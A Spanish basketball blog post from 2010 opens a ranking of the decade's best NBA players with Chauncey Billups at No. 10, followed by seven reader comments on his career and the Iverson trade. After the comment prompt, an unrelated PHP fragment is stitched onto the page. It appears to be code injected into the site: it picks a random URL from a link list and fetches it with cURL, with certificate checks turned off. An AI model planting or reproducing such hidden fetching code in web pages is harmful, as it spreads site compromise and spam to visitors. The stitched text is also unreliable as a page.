Los 10 mejores de la década: Nº10

21 de September de 2010 por Viva_Dirk
Artículo 1 de 10 de la serie Los mejores de la década

Antes de comenzar esta nueva década con la temporada 2010-2011 me gustaría analizar con nombres propios lo que nos dejó la pasada. Os avanzo que faltarán nombres ilustres como en todas las listas que se puedan realizar y es que he intentado hacer una selección basada en los logros colectivos, los premios individuales y las estadísticas, pero también he tenido especial cuidado en valorar el rendimiento en todas y cada una de las campañas de la década, dando un valor añadido a la regularidad y profesionalidad, seña de identidad de los más grandes deportistas de todos los tiempos.

Empezaremos como es lógico con el Nº10.

10.- CHAUNCEY BILLUPS

Si hace 10 años hubiésemos dicho que este base nacido en Denver iba a optar a una lista de los diez mejores jugadores de la década nadie nos hubiese creído.

A pesar de haber sido todo un nº3 del draft de 1997,  tras unas 3 decepcionantes primeras campañas en la liga, en Celtics, Raptors y la primera etapa en los Nuggets, Billups era considerado un base del montón. Su promedio de asistencias era de 3.6 en casi 30 minutos de juego y se había perdido la temporada 99-00 casi al completo. Después de eso pasó dos temporadas en los Wolves donde consiguió dos clasificaciones para play-offs pero apenas logró hacerse con el puesto de base titular.

En el verano de 2002 fue traspasado a Detroit, donde por fin vimos aparecer al jugador que ahora conocemos al encontrar su sitio en el juego austero de Carlisle, llevando a los Pistons a la final de conferencia, terreno que no pisaban hacía más de 10 años y al que pronto iban a acostumbrarse.

Ya en la temporada siguiente esos Pistons iban a enseñarle al planeta el poder del grupo destrozando en la final de la NBA a los Lakers de Shaq, Kobe, Malone y Payton. Los Pistons habían sustituido al rácano Carlisle por el presidente del club de los amarrateguis, Larry Brown, con el que Billups, gracias a su extraordinaria capacidad defensiva y su profesionalidad y disciplina, jamás desentonó.  En aquella final del 2004 fue nombrado MVP promediando 21 puntos, 3.2 rebotes, 5.2 asistencias y 1.2 robos. Tan solo 2 años antes había salido de los Wolves sin pena ni gloria.

Ese grupo comandado por Billups volvieron al año siguiente nuevamente a la final de la NBA.  Entonces hicieron sudar sangre a los San Antonio Spurs que terminaron llevándose el anillo con un apretadísimo 4-3.  A punto  estuvieron de emular a los BadBoys y se pusieron a su altura como equipo tras lograr otras 3 finales de conferencia en los 3 siguientes años, lo que hace un total de 6 finales de conferencia en los 6 años que Billups estuvo en los Pistons.  6 fueron también las temporadas que alcanzo la categoría de All-Star tras la mítica final ganada. Todo un logro.

Abandonaría la franquicia de la Motown rumbo a casa en la temporada 2008-09 y nada más aterrizar devolvió a los Nuggets a una final de conferencia 24 años después de que lo hiciera Alex English. Lo hizo con su sello, bajando las revoluciones de todos, incluído Carmelo y convirtiéndose en lo que Denver necesitaba en cada momento. A pesar de los 34 años que cumplirá en unos días, Billups alcanzó el año paado su mejor media anotadora en una temporada con 19.5 puntos por noche , confirmándose como uno de los mejores tiradores de lo que va de siglo. Además, nuevamente ha jugado casi todos los partidos de su equipo, y es que de los 820 partidos que podría haber disputado en 10 años, ha estado presente en778. Todo un seguro de vida.

Por contra, todos conocemos la trayectoria de su ex-equipo desde que salió injustamente por la puerta de atrás. La pérdida se demostró incalculable, poniendo todavía más de manifiesto la grandeza del inigualable Mr. Big Shot.

Comenta

7 comentarios a esta entrada

  1. Rompe dice:
    #1

    Un grande sin duda! Por lo que es y por lo que hace jugar a sus compañeros! Muy buen artículo 😉

      Citar

  2. rojorob dice:
    #2

    Vamos otra vez !!!

      Citar

  3. telekoman dice:
    #3

    Jamás entendí bien por qué Dumars lo cambió por Iverson. No creo que el aspecto monetario compensara lo que este tío aportaba a Detroit. Stuckey no estaba listo y en que se gastó el dinero conseguido no fue sin duda la mejor opción.

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno… yo quizás sí entendí aquello en ciertos términos a priori, pero jamás en las formas. Entendí que la apuesta por AI era por encima de todo en vistas a liberar mucho salario y la reconstrucción… y de paso si hubiera tocado la flauta y Iverson hubiera rendido bien entonces, asegurando playoffs, y/o hubiera decidido quedarse con un contrato asequible y arrimando el hombro (juass) la jugada hubiera salido redonda. Lo que me parece claro es que todos esperábamos ya un cambio de guardia, aunque quizás lo último que esperábamos era que se produjera por la vía Billups. Y va y encima éste se lo agradeció saliéndose por todos lados en Denver… tiene guasa.

    El problema es que después de aquello Dumars no ha dejado de cometer cagada tras cagada (unas más esperadas y otras menos) y encima no se ha desligado del todo de la vieja guardia, que claramente se la tiene jurada. Ahora ya veremos cómo resuelve el papelón que tiene encima.

    Para mí Billups es uno de los más grandes que he visto. Uno de los más infravalorados de todos los tiempos… y que lamentablemente sólo algunos recordaremos de aquí a no mucho tiempo. Me parece que, con mucho esfuerzo, ha logrado alcanzar el mejor ideal de base… y eso que al principio no era tal cosa.

      Citar

  5. Óscar dice:
    #5

    Pasado el tiempo, yo creo que hasta Dumars reconocerá el error que cometió al traspasar a Billups a Denver. Buscaba renovar un plantilla que creía había tocado techo, y ya vemos lo que ha conseguido tras la última temporada. Con Chauncey, Hamilton y Prince como columna vertebral, más los Ben Wallace o McDyess (que entró en el traspaso de Iverson pero se negó a jugar en los Nuggets), tendría que haberse ocupado de añadir elementos de calidad y jóvenes a esa estructura. Ben Gordon y Villanueva habrían sido la guinda, pero no la base, o una de ellas. También es cierto que las lesiones se han cebado con los Pistons desde 2008.
    Quizá Dumars pensó en que la progresión de Rodney Stuckey sería mayor, por su enorme potencial… En eso no le culpo, a mi me ha ocurrido lo mismo, aunque aún tiene tiempo.
    Billups, un grande. Ahora faltan nueve…

      Citar

  6. CAMPO2 dice:
    #6

    Uno de mis favoritos por su profesionalidad y su compañerismo por el bien del equipo

      Citar

  7. Txusma dice:
    #7

    Además se podría añadir que ha sido campeón del mundo con su selección y sin duda, ha sido de los mejores de su equipo. Seguro que ha sido un ejemplo para los Rose, Westbrook, Gordon, etc… Debería cobrar por cada “Master Class” que imparte

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>